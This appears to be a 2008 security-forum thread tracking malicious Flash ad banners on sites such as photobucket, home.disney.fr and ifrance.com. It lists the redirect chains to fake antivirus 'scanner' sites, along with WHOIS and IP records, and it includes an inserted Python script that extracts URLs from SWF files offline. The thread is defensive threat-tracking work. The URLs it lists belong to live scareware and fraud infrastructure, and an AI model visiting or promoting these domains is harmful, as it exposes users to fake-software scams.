Online Help Center: http://photobucket.com/tips.php
FAQ's: http://photobucket.com/faq
Support Forums: http://forums.photobucket.com
Support Email: support@photobucket.com
If only the Advertisement Team would have been so speedy too ... people would be able to surf without exasperation.

At the time of the write up I have no idea if the malvertisement for The Fast & The Furious - Tokyo Drift has been removed. If anyone still encounters the banner, drop us a note please. Thanks.
______________________________

Updated 20:52 PM

WTF are they doing at Photobucket? They got all the details!!!
http://forums.majorgeeks.com/showpost.php?...amp;postcount=5
Kimberly
<h4>
photobucket.com - still not fixed
</h4>
This is getting ridiculous, I did browse 1 page and what popped up ... yep the malvertisement for The Fast and The Furious - Tokyo Drift.

Screenshot in situ.
Is it so difficult to remove those banners from circulation? We did send them all the details, other people did the same thing. This slowness is simply NOT ACCEPTABLE. The banners have been identified 4 days ago!!!

Adopstool tests.
  1. Lady SpeedStick.
  2. Tokyo Drift.
<h4>
www.rlslog.net
</h4>
The banner isn't rotating anymore. The direct link to the malvertisement is still active though at the time of the write up.

<h4>
www.mininova.org
</h4>
Thanks to the prompt reaction of Niek (admin), the banner has been disabled very fast, so that issue is now officially fixed. - Announcement.
Kimberly
<h4>
Speedbit banner
</h4>
Forwarded by a contact.

Banner.
Campaign.
page2.googiesindication.com/c/index.php?id=cm5DRWVaWWdjU0djeld3NjM2SmpoPTEyMTA2NzQwNjEmcG56Y252dGE9dnNwbGVyYW52cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=ifcyrenaic
The banner itself isn't new. It was first seen on Mar 12 2008.
page2.googiesindication.com was associated with a banner from ForceUp - Desperately Seeking Buyers ....

In this case, the person was approached by Tiffany Moon from Proximogroup. They have been involved in several cases of malvertisements in the past. - Ref.

Proximogroup.com shares the same IP as 4cetera.com who has been caught selling malicious banners in the past also. - Ref.

130.117.78.25
  1. 4cetera.com
  2. Proximogroup
<h4>
photobucket.com - Tokyo Drift malvert
</h4>
If they can't fix it, try to fix it yourself ... which has been done with success by Sandi. - Ref.
Tokyo Drift has been cleaned up but we are not able to confirm if the Lady Speedstick banner has been removed or not at the time of the write up.
Kimberly
<h4>
Ringtones - Updated Campaign
</h4>
Forwarded by a contact. The 728x90 banner, linked to a different campaign, was first seen on Apr 3 2008.

Associated URLs.
openadstream.net/ad0.php?url=[removed]

xp-vista-update.net/?id=174400150
At the time of the write up, xp-vista-update.net/?id=174400150 redirects to Google.
Kimberly
<h4>
Ebooks - New Banner
</h4>
Forwarded by a contact.

Banner.
Campaign.
stathisranch.com/crossdomain.xml
stathisranch.com/c/index.php?id=a3IzT2xJNUJnVGhUNkm7NkiZ0Tkp0ME9oPTEyMTA5MzY5NDEmcG56Y252dGE9b2Jib2J2m7NkiZnm7NkiZyNgYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=booboisie6&adid=intl

adnetserver.com/?cmp=tmsmsposl&poa=booboisie6&pol=intl&apo=1&epo=1&edpo=2&mt_info=6019_7908_19338&rdr=1

performanceoptimizer.com/.landing?cmp=tmsmsposl&poa=booboisie6&[removed]

stats.sellmosoft.net/pos_id_performanceoptimizer/poa_booboisie6_pot103s_fr_en_edpo2/pol_intl/por_/lp_true/stats.php
Kimberly
<h4>
New survey banner
</h4>
Forwarded by email.

Banner.
Associated URLs.
impressiontracker.com/url/sc_6.php

yourredirect.com/soft.php?aid=000417&d=3&product=XPA
onlinescannerxp.com/2008/3/freescan.php?aid=[removed]
<h4>
impressiontracker.com - 89.149.253.221
</h4>
impressiontracker.com/url/sc_6.php
CODE
HTTP/1.1 200 OK
Date: Sun, 08 Jun 2008 13:26:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Length: 0
Connection: close
Content-Type: text/html

Getting the content triggers an IDS intrusion attempt stating invalid TCP/IP options.
impressiontracker.com - 89.149.253.221

Website Title: None given.
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-08
Expires: 2009-04-08
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com
Server Type: Apache
IP Address: 89.149.253.221
IP Location - Germany - Netdirekt E.k

Registrant Search: "eosads" owns about 4 other domains.
Dedicated Hosting: impressiontracker.com is hosted on a dedicated server.

Domain Name: IMPRESSIONTRACKER.COM

Creation Date: 08-Apr-2008
Expiration Date: 08-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
eosads
Carol Hamilton carol(at)eosads.com
Baterman 58 -136
London
London,W3Z 1AC
GB
Tel. +02.089446866

<h4>
yourredirect.com - 72.233.40.59
</h4>
Website Title: 404 - Not Found
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-04-04
Expires: 2009-04-04
Name Server: NS1.MYNICK.NAME (has 2,247 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

Server Type: lighttpd
IP Address: 72.233.40.59
IP Location - Texas - Plano - Layered Technologies Inc

Dedicated Hosting: yourredirect.com is hosted on a dedicated server.

Domain Name: YOURREDIRECT.COM

Creation Date: 04-Apr-2008
Expiration Date: 04-Apr-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Last updated on 2008-05-26

<h4>
eosads.com - 216.195.62.169
</h4>
Website Title: EOSads - Internet Marketing and Online Advertising Agency
ICANN Registrar: ESTDOMAINS, INC.
Created: 2007-02-08
Expires: 2009-02-08
Name Server: DNS273.3FN.NET (has 10,885 domains)
Name Server: NS2.3FN.NET
Whois Server: whois.estdomains.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 216.195.62.169
IP Location - California - San Anselmo - Aps Telecom

Reverse IP: 85 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: EOSADS.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 08-Feb-2007
Expiration Date: 08-Feb-2009

Domain servers in listed order:
ns2.3fn.net
dns273.3fn.net

Full List of "Customers".
  1. 21st Century Insurance
  2. America West Vacations
  3. Avenue
  4. Back in the Saddle
  5. BBC America
  6. Beauty.com
  7. British Airways Holidays
  8. Cambridge Soundworks
  9. Dick Blick Art Materials
  10. Discover Card
  11. EssayEdge
  12. Flaxart
  13. Haband
  14. Hooked on Phonics
  15. Hotwire
  16. iFLOOR
  17. iMaternity
  18. iPrint
  19. Jockey
  20. Johnson Smith
  21. Jostens
  22. Keen
  23. Linens 'n Things
  24. Liz Claiborne
  25. Maidenform
  26. Max Studio
  27. MusicMatch
  28. National Geographic
  29. Network Solutions
  30. NetZero
  31. Origins
  32. Palm Store
  33. PeoplePC
  34. Pine Meadow Golf
  35. Pitney Bowes
  36. Rail Europe
  37. S&S Worldwide
  38. SBC Communications
  39. SeaBear Smokehouse
  40. Shindigz by Stumps
  41. Springhill Nursery
  42. The Apple Store
  43. The House
  44. The Tire Rack
  45. Thomas Pink
  46. Vermont Country Store
  47. Warner Bros.
  48. Weight Watchers
  49. Yahoo! Personals
  50. Zappos
If the above "customers" list is real, may I suggest EVERYONE checks ALL the creatives received from EOSads !!!

Other Websites.
Kimberly
<h4>
home.disney.fr
</h4>
Two updated CinemaNow malvertizements are present and active on Disney France - website home.disney.fr

Screenshot in situ.
IPB Image
Banner n°1.
openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_MEGA_CINEMA_NOW/cinemanow_728x90.swf
IPB Image
Campaign.
adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650097
xponlinescanner.com/soft.php?aid=024218&d=3&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77024218
______________________________

Banner n°2.
openad.tf1.fr/RealMedia/ads/Creatives/OasDefault/AUTOPROMO_DISNEY_SKY_CINEMA_NOW/cinemanow_120x600.swf
IPB Image IPB Image
Campaign.
adoptserver.info/_stat029.gif?url=[removed]

windowsxp-privacy.net/?id=987650098
xponlinescanner.com/soft.php?aid=024217&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77024217
______________________________

canonical name oas.mephisto.jmsp.net.
aliases openad.tf1.fr
addresses 212.23.180.17

212.23.180.17 - Jetmultimedia France

The RealMedia creatives are hosted by TF1, so they might show up on other French websites. Caution is advised.

Note: Special thanks to Malekal_morte who asked for additional details when reported here.

<h4>
Caution
</h4>
A word of caution to those manipulating the SWF files for analysis. The creative reports back to 216.195.62.80 as seen below.
IPB Image
Note: The name of the application has been removed on purpose.

216.195.62.80 is located in the same range as eosads.com (216.195.62.169)

IP Information for 216.195.62.80

OrgName: APS Telecom
OrgID: APSTE
Address: 8130 SW BEAVERTON-HILLSDALE HWY
City: PORTLAND
StateProv: OR
PostalCode: 97225
Country: US
NetRange: 216.195.32.0 - 216.195.63.255
CIDR: 216.195.32.0/19
NetName: APS-EPSI
NetHandle: NET-216-195-32-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.3FN.NET
NameServer: NS2.3FN.NET

Websites.
  1. Adoptserver.info
  2. Articleseasy.info
  3. Bestsporno.info
  4. Burumba.net
  5. Flanp.info
  6. Flatq.info
  7. For-ease.com
  8. Futurecho.com
  9. Itradeport.com
  10. Krevedkoff.com
  11. Kvartirstroy.com
  12. L12.biz
  13. Memberpass.info
  14. Miroor.net
  15. Mirosite.com
  16. Mp3sdir.com
  17. Niobemenendez.com
  18. Penobetons.com
  19. Plagiarism-free-thesis.info
  20. Plusarticles.info
  21. Pointarticles.info
  22. Pornosaitov.net
  23. Rape-reviews.com
  24. Rusexvideo.net
  25. Salearticles.info
  26. Shtukaturko.com
  27. Sipuchka.com
  28. Skaappi.org
  29. Spako-ru.com
  30. Stroyangar.com
  31. Stroydomov.com
  32. Stroyofis.com
  33. Stroysklad.com
  34. Teplodoms.com
  35. Teploizol.com
  36. Thfonline.org
  37. Truthcommissionconference.org
  38. Webflikr.info
  39. Writingblog.biz
Kimberly
<h4>
New banner : Nike
</h4>
Forwarded by a contact.

Banner.
trueffect-cdn.com/20880/728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
track.trackads.net/statsa.php?campaign=20880&u=1213102076650
track.trackads.net/swf/gnida.swf?campaign=20880&u=1213102076650&
paramss=[removed]

track.trackads.net/statss.php?campaign=20880&u=1213102076650&
paramss=[removed]

tds.maxconvert.com/?paramss=[removed]
adtds.trackads.net/in.cgi?2&depid=[removed]&cid=[removed]&parid=[removed]
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&bs=1&lang=en
spywaredestructor.com/scanner/scan.php?landid=[removed]&depid=&cid=&parid=&lang=en
<h4>
trueffect-cdn.com - 67.205.93.101
</h4>
Website Title: TruEffect delivers next generation online advertising solutions for agencies, advertisers and publishers.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-29
Expires: 2009-05-29
Name Server: NS1.TRUEFFECT-CDN.COM (has 1 domains)
Name Server: NS2.TRUEFFECT-CDN.COM
Whois Server: whois.estdomains.com

Server Type: Microsoft-IIS/6.0
IP Location - Ukraine - Private Customer - Iweb
Dedicated Hosting: trueffect-cdn.com is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: TRUEFFECT-CDN.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Record last updated on 2008-06-01
______________________________

You might notice that the IP of atlas-ads.com, another bad advertiser, is 67.205.93.102, which makes them neighbours.

Just like with atlas-ads.com in the past, don't get fooled when you visit the homepage of trueffect-cdn.com, they don't have a homepage but redirect you to a legit advertising company named TrueEffect Inc. TrueEffect Inc has earned certified status in Microsoft Corp.'s Partner Program on February 12, 2007.
IPB Image
CODE
URL = http://trueffect-cdn.com
UAG = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
AEN =
REQ = GET; VER = 1.1; FMT = AUTO
Sending request:
GET / HTTP/1.1
Host: trueffect-cdn.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Connection: close

• Finding host IP address...
• Host IP address = 67.205.93.101
• Finding TCP protocol...
• Binding to local socket...
• Connecting to host...
• Sending request...
• Waiting for response...

Receiving Header:
HTTP/1.1·302·Found(CR)(LF)
X-Powered-By:·PHP/5.2.5-3(CR)(LF)
Location:·http://trueffect.com(CR)(LF)
Content-type:·text/html(CR)(LF)
Content-Length:·0(CR)(LF)
Connection:·close(CR)(LF)
Date:·Tue,·10·Jun·2008·14:21:47·GMT(CR)(LF)
Server:·lighttpd/1.5.0(CR)(LF)
(CR)(LF)

<h4>
spywaredestructor.com - 67.205.75.9
</h4>
spywaredestructor.com still has the same IP.

spywaredestructor.com - 67.205.75.9

Website Title: .: SpywareDestructor - the best antispyware ever :.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-17
Expires: 2009-01-17
Name Server: NS.SPYWAREDESTRUCTOR.COM
Name Server: NS1.US.EDITDNS.NET (has 9,561 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.9
IP Location - Ukraine - Individual

Reverse IP: 2 other sites hosted on this server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: SPYWAREDESTRUCTOR.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Current Websites.
  1. Antispywaredeluxe.com
  2. pidosoftware.com
  3. Spywaredestructor.com
Kimberly
<h4>
ifrance.com - paysagevirtuel.ifrance.com
</h4>
Curves malvertizement present on personal websites - paysagevirtuel.ifrance.com in this case - hosted on ifrance.com. This is not the first time we have had echoes about malicious banners being present over there. The creative is hosted on their own website and we see Gemini Internactive at work again. Fuse Kit 2.1.4 has been used in this creative.

Screenshot in situ.
IPB Image
Banner.
image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213

Note: Reported here
Kimberly
<h4>
Ringtones - Updated Campaign
</h4>
Forwarded by a contact.

The ringtones banner has been updated again. Fuse Kit 2.1.4 has been used in this creative and the malvertizement fails the Adopstools test.

Banner.
IPB Image
Campaign.
openadstream.net/ad07.gif?url=[removed]

xp-vista-update.net/?id=34866151134
fastwebway.com/soft.php?aid=011810&d=0&product=XPA
xponlinescanner.com/2008/3/freescan.php?aid=77011810
<h4>
Caution
</h4>
A word of caution to those manipulating the SWF files for analysis. The creative reports back to 67.210.12.62 as seen below.
IPB Image
Note: The name of the application has been removed on purpose.

openadstream.net - 67.210.12.62

Website Title: None given.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-12
Expires: 2009-01-12
Name Server: MANAGEDNS1.ESTBOXES.COM (has 7,902 domains)
Name Server: MANAGEDNS2.ESTBOXES.COM
Name Server: MANAGEDNS3.ESTBOXES.COM
Name Server: MANAGEDNS4.ESTBOXES.COM
Whois Server: whois.estdomains.com

IP Location - Texas - Freeport - Cernel Inc
Dedicated Hosting: openadstream.net is hosted on a dedicated server.

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: OPENADSTREAM.NET

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

<h4>
www.gamerevolution.com
</h4>
A malicious banner *might* still be present on www.gamerevolution.com. All information is highly appreciated.
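The two "Caution" notes above warn that the SWF creatives phone home (to 216.195.62.80 and to openadstream.net at 67.210.12.62) as soon as they are loaded for analysis. One way to look at a banner's embedded redirect targets without loading it in a player is to read the container statically. What follows is an added example written for this thread, not a tool from the thread or from any company named in it: it handles the uncompressed (FWS) and zlib-compressed (CWS) SWF containers and builds its own small sample file, with strings modelled on the campaign URLs posted above, so it runs offline. The TLD list and the `AS_NAMESPACES` filter are my own choices.

```python
"""Pull URL / hostname indicators out of an SWF creative without running it.

Added example written for this thread, not a tool from the thread.  It
inflates the container and scans the tag stream for string constants that
look like hostnames or URLs, which is where redirecting banners of this
era kept their targets.  Strings assembled at runtime are invisible to it.
"""
import re
import struct
import zlib

# Hostname or URL, restricted to TLDs that occur in the thread so that
# ActionScript package names (flash.display, flash.net ...) do not all match.
INDICATOR_RE = re.compile(
    rb"(?:https?://)?(?:[a-z0-9-]+\.)+(?:com|net|org|info|biz|ws|fr|es)(?:/[\x21-\x7e]*)?",
    re.IGNORECASE,
)
# Package roots of the Flash runtime that still collide with real TLDs.
AS_NAMESPACES = ("flash.", "fl.", "mx.")


def swf_body(data: bytes):
    """Return (version, uncompressed tag stream) for an FWS or CWS file."""
    if len(data) < 8:
        raise ValueError("too short to be an SWF")
    signature, version = data[:3], data[3]
    declared_len = struct.unpack("<I", data[4:8])[0]  # whole file, header included
    if declared_len <= 8:
        raise ValueError("declared length does not cover a body")
    if signature == b"FWS":
        body = data[8:]
    elif signature == b"CWS":
        # Cap inflation at the declared size so a hostile file cannot
        # decompress into gigabytes; max_length=0 would mean "no limit".
        body = zlib.decompressobj().decompress(data[8:], max_length=declared_len - 8)
    elif signature == b"ZWS":
        raise ValueError("LZMA (ZWS) container not handled by this example")
    else:
        raise ValueError("not an SWF: bad signature")
    return version, body


def extract_indicators(data: bytes) -> list:
    """Unique URL/hostname strings in order of first appearance."""
    _, body = swf_body(data)
    found = []
    for match in INDICATOR_RE.finditer(body):
        text = match.group(0).decode("ascii")
        host = text.split("://", 1)[-1].split("/", 1)[0].lower()
        if host.startswith(AS_NAMESPACES) or text in found:
            continue
        found.append(text)
    return found


def build_sample_cws(strings) -> bytes:
    """Constructed fixture: a minimal CWS wrapper around NUL-separated strings.

    The 21 zero bytes stand in for the frame-size/rate/count fields that
    follow the header; this example never interprets them.
    """
    body = b"\x00" * 21 + b"\x00".join(strings) + b"\x00"
    return b"CWS" + bytes([9]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)


# Sample strings modelled on the campaign URLs posted in this thread plus
# two ActionScript identifiers that a naive scan would misreport.
SAMPLE_STRINGS = [
    b"onRelease",
    b"flash.net.URLRequest",
    b"http://adoptserver.info/_stat029.gif?url=",
    b"windowsxp-privacy.net/?id=987650097",
]

if __name__ == "__main__":
    for item in extract_indicators(build_sample_cws(SAMPLE_STRINGS)):
        print(item)
```

Run it against a real creative with `extract_indicators(open(path, "rb").read())`; nothing is executed, so the callback the thread warns about never fires. The trade-off is visibility: a banner that concatenates its target from pieces, or decodes it at runtime, only shows up in a debugger or in a decompiled ActionScript listing.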
Kimberly
<h4>
New banner - diamondharmony.com
</h4>
A completely new jewelry malvertizement featuring diamondharmony.com has been forwarded to us by a contact.

Banner.
IPB Image
IPB Image
IPB Image
IPB Image
Associated URL.
adoptserver.info/_stat.gif?url=[removed]
Note: I will post more information about other links if possible after a more complete examination of the banner.

Although many older banners are still present on the web (see below), this creative is part of a new series using Fuse Kit 2.1.4. just like the new curves & ringtones ones.

<h4>
screensavers.com
</h4>
As said earlier, many older advertisements are still present on the web. Screensavers.com is a perfect example of this phenomenon. The alert was given a couple of days ago; the site seems clean now at first sight, but the direct links still work.

Screenshots in situ.
IPB Image
IPB Image
Banner n°1 - ShopAtHomeTV.
c5.zedo.com/OzoDB/j/e/260649/V4/120x600.swf
Campaign.
mysurvey4u.com/crossdomain.xml
mysurvey4u.com/stats.php?campaign=shesmall&u=1212639076765
The campaign is inactive but information is still transmitted to the server.

stats.php
CODE
f(CR)(LF)
stats=620208842(CR)(LF)
0(CR)(LF)
(CR)(LF)
______________________________

Banner n°2 - Traveltray.
c13.zedo.com/OzoDB/n/e/260653/V3/728_INTL.swf
Campaign.
adtraff.com/statsa.php?campaign=l9rge5tx&u=1212640525488
adtraff.com/swf/gnida.swf?campaign=l9rge5tx&u=1212640525488
adtraff.com/statss.php?campaign=l9rge5tx&u=1212640525488
blessedads.com/?cmpid=l9rge5tx&adid=728
prevedmarketing.com/?tmn=mwatmpsmcmp&aid=l9rge5tx&lid=728&ax=1&ed=2&mt_info=4197_1814_16615&rdr=1
scanner2.malware-scan.com/18_swp/?tmn=null&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=&ax=1&ed=2&mt_info=4197_1814_16615:5745_0_16606&rdr=2
bucksbill.com/.stats/refil.php?p=18&aid=l9rge5tx_ma18s_mb1sct&lid=728&affid=keyin
Kimberly
<h4>
www.lyricsdownload.com - ringtones
</h4>
2 malicious ringtones banners are present on www.lyricsdownload.com. A couple of days ago we saw the 160x600 updated version of the banner, this time the 728x90 and 300x250 went live. Both are using Fuse Kit 2.1.4 again.

Screenshot in situ.
IPB Image
Banner.
banners.valuead.com/omd/37/63.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803
______________________________

Screenshot in situ.
IPB Image
Banner.
banners.valuead.com/omd/39/62.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804
Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62
Kimberly
<h4>
www.lyricsandsongs.com - ringtones
</h4>
www.lyricsandsongs.com is also showing 2 malicious ringtones banners. Ya even get the 2 for the price of 1 as seen on the screenshot below. We even see the redirect happen live, notice xponlinescanner.com in the address & status bar.

Screenshot in situ.
IPB Image
Banner n°1.

This is the same banner and campaign as seen on www.lyricsdownload.com earlier today.
banners.valuead.com/omd/37/63.swf
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=65254419402
xponlinescanner.com/soft.php?aid=011803&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011803
______________________________

Banner n°2.
banners.valuead.com/omd/38/61.swf
IPB Image
Campaign.
openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802
Again a word of caution to those manipulating the SWF files for analysis. The creative reports back to openadstream.net - 67.210.12.62
Kimberly
<h4>
www.bigoo.ws - ringtones
</h4>
Never two without three .... www.bigoo.ws, a website with Graphics, Backgrounds, Icons, Pimp my profile stuff for MySpace, Friendster, Hi5 ... etc.

Screenshots in situ.
IPB Image
The culprit ... yep ringtones again. The 160x600 version is also present on the website, I just wasn't fast enough to capture it.
IPB Image
Banners & campaign are the same as www.lyricsandsongs.com - www.lyricsdownload.com
______________________________

Banner 300x250.
banners.valuead.com/omd/39/62.swf
Campaign.
openadstream.net/ad09.gif?url=[removed]

xp-vista-update.net/?id=55366518900
xponlinescanner.com/soft.php?aid=011804&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011804

______________________________

Banner 160x600.
banners.valuead.com/omd/38/61.swf
Campaign.
openadstream.net/ad09.gif?[removed]

xp-vista-update.net/?id=95182371212
xponlinescanner.com/soft.php?aid=011802&d=2&product=XPA
xponlinescanner.com/2008/2/freescan.php?aid=77011802
Kimberly
<h4>
www.lyricsdownload.com & www.lyricsandsongs.com & www.bigoo.ws
</h4>
Shortly after contacting ValueAd Inc, I received an email saying that their support services and the customers got notified about the problem. Although yesterday the ringtones malvertizement was still being displayed, all 3 sites “seem” clean now.

<h4>
ifrance.com
</h4>
The curves malvertizement is still being displayed at ifrance.com as seen below.
IPB Image
ifrance has been contacted by me and the site owner through their support system. Furthermore, iEUROP has also been notified by me about the problem. Nothing has been done yet, this is again unacceptable. When are ifrance / iEUROP going to realize that a responsible attitude towards their customers and visitors is needed instead of ignoring reports about malware? The same goes for any other advertisers, website owners, hosting companies … .

Do not visit websites hosted on ifrance.com unless you have taken appropriate measures in order to protect yourself. Either block Flash content from being displayed, or block anything coming from image.ifrance.com/img/pub in your ad blocker until further notice.
Kimberly
<h4>
Latest news
</h4>
Shockwave in the news again.

Shockwave exploits

thx to MAD for the heads up.
______________________________

ifrance.

The curves malvert is still up and active, and their services persist in remaining silent. MAD made a nice write up about the SWF problem in French with links to different online articles.
iFRANCE, nous avons un problème...
Kimberly
<h4>
ifrance.com is still serving malvertizements
</h4>
On Jun 12 2008, 06:02 PM we first caught the malicious banner being displayed at websites hosted on ifrance.com. Today, 9 days later, ifrance hasn't replied to any of our notifications. The malvertizement is still redirecting people to xponlinescanner.com, no matter what site hosted at ifrance they visit.
IPB Image
If you have a site hosted at ifrance, please contact them; this mess has to be cleaned up. pharmacies-gms.ifrance.com, paysagevirtuel.ifrance.com ... how many other sites are hosted over there? Maybe it should hit the headlines in some newspapers; people are much keener to respond then. We learned that when Yahoo was displaying malverts.
Kimberly
<h4>
ifrance.com - isuisse.com
</h4>
We've got a serious problem going on here. The curves malvertizement is being displayed not only on ALL websites hosted on *.ifrance.com but also on *.isuisse.com, as reported here today by the site owner of hb9mdl.isuisse.com.
Of course ifrance and iEUROP have been contacted again by several persons, including me.

Note: the forum software is cutting off the direct link, my apologies for that. Copy / paste the line below but be sure to remove the space between & and #
forum.pcastuces.com/probleme_acces_site_internet-f2s13386.htm?page=1& #2862245


Screenshot in situ.
IPB Image
Banner.
image.ifrance.com/img/pub/geminiinternactive/curves/curves_728x90.swf
IPB Image
Campaign.
adoptserver.info/_online.gif?utmwv=[removed]

windowsxp-privacy.net/?id=987650085
fastwebway.com/soft.php?aid=024213&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77024213
IPB Image
IPB Image
IPB Image
<h4>
iEUROP
</h4>
iEUROP
QUOTE
Figures overview

+ 15 internet portals
+ 22 millions of visitors of all the portals (Origin Mediametrie eStat)
+ 110 millions of visited pages
+ 4 500 000 Members : webmail, websites, blogs…
+ 14 000 clients on paying hosting
iEUROP ACT please !!! - Remove the curves malvertizement from your advertising system.
Kimberly
<h4>
ifrance.com - First Choice banner
</h4>
Seeing is believing … well you have to see this one to believe it actually. A secondary malicious banner is rotating on ifrance. This time it’s the First Choice banner sold by Proximogroup and again hosted on their own servers. The redirect to waytotheprofit.com is visible in the status bar of Internet Explorer. Website visited: frankyturf.ifrance.com

Screenshot in situ.
IPB Image
The malvertizement is even displayed twice.
IPB Image
Banner.
image.ifrance.com/img/pub/proximogroup/firstchoiceFR_468x60.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
click.adlbrite.com/crossdomain.xml
click.adlbrite.com/c/index.php?id=UHJPazY1m7NkiZ0Rm7NkiZODRNcEYybU1pM1m7NkiZoPTEyMDUzMzQ4ODcmcG56Y252dGE9bmdlcnBlcm5hm7NkiZwYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=atrecreant
The banner is a bit buggy so we keep turning around in circles a little bit hitting waytotheprofit.com while the redirect slowly continues in the background.
prevedmarketing.com/?tmn=mwatmp&aid=atrecreant&lid=&ax=1&ed=2&mt_info=5752_6372_2358&rdr=1
adverdaemon.com/?tmn=mwatmp&aid=atrecreant&lid=&ax=1&ed=[removed]
performanceoptimizer.com/.landing/index.php?[removed]
stats.sellmosoft.net/pos_id_performanceoptimizer/poa_atrecreant_pot103s_fr_en_edpo2/pol_keyin/por_/lp_true/stats.php
IPB Image
<h4>
adverdaemon.com - 76.74.249.30
</h4>
I never encountered this domain in the redirects before, but it did appear and shares its IP with different well known domains as seen first here.

adverdaemon.com - 76.74.249.30

Website Title: None given.
ICANN Registrar: TUCOWS INC.
Created: 2007-04-20
Expires: 2009-04-20
Updated: 2008-04-21

Server Type: lighttpd/1.4.13
IP Address: 76.74.249.30
IP Location - Texas - San Antonio - Serverbeach
Reverse IP: 32 other sites hosted on this server.

Whois Record

Registrant:
Adverdaemon Inc.
271 N Snelling Ave
Saint Paul, MN 55104
US

Domain name: ADVERDAEMON.COM

Administrative Contact:
Hostmaster, Adverdaemon Inc. adverdaemon@yahoo.com
271 N Snelling Ave
Saint Paul, MN 55104
US
(651) 644-4579
Technical Contact:
Hostmaster, Adverdaemon Inc. adverdaemon@yahoo.com
271 N Snelling Ave
Saint Paul, MN 55104
US
(651) 644-4579

Registrar of Record: TUCOWS, INC.
Record last updated on 21-Apr-2008.
Record expires on 20-Apr-2009.
Record created on 20-Apr-2007.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS2.ADVERDAEMON.COM 208.79.82.66
NS3.ADVERDAEMON.COM 77.73.98.2
NS4.ADVERDAEMON.COM 77.73.98.4
NS1.ADVERDAEMON.COM 208.79.82.50

